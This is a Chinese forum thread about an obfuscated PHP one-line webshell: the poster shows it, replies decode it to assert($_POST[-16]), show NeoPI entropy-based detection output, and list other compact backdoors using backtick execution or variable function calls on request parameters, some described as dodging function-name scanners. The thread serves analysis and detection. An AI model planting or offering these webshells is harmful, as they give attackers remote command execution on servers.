一个有意思的PHP一句话后门，怎么破？

看到一个有意思的php一句话：

                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

回复内容：

assert($_POST[-16]);
?> 我觉得题主应该是问的密码是多少吧，这个一句话后面注释全部去掉之后，POST数组的key其实是一个算术运算

0-11-5

这一点也谈不上新奇，也谈不上是我见过的最变态的PHP后门。

如果有服务器权限，可以扫描文件的话（作为管理员没道理不行吧？），这类后门会被一类使用统计方法（计算包括信息熵、Index of Coincidence在内的一系列统计指标）的检测工具直接干爆。给一个很简单的例子：Neohapsis/NeoPI · GitHub

使用这个Python脚本检查这个文件：

[[ Average IC for Search ]]
0.139386719155

[[ Top 10 lowest IC files ]]
  0.1394        ./test/test.php

[[ Top 10 entropic files for a given search ]]
  3.5443        ./test/test.php

[[ Top 10 longest word files ]]
      60        ./test/test.php

[[ Top 10 signature match counts ]]
       0        ./test/test.php

[[ Top 10 SUPER-signature match counts (These are usually bad!) ]]
       0        ./test/test.php

[[ Top cumulative ranked files ]]
       5        ./test/test.php

/*-/*-*/ 注释 ：）

作为一个看了一年后门的人，已经能分清一句话是公是母了，这种马确实不太奇怪,
我觉得比较有意思的一句话后门有
echo `$_GET['id']` //插在文件中比较难发现
?>

 ($_=$I.$_GET[3]).$_($I.$_POST[4])?> 据说PKAV大牛最近写了个生成这种后门的网页

 $_POST['s']($_POST['cmd']);//躲避函数名查杀
?>

还有用inlude调用图片的马

仅仅是字符拆分，躲避关键函数名查杀。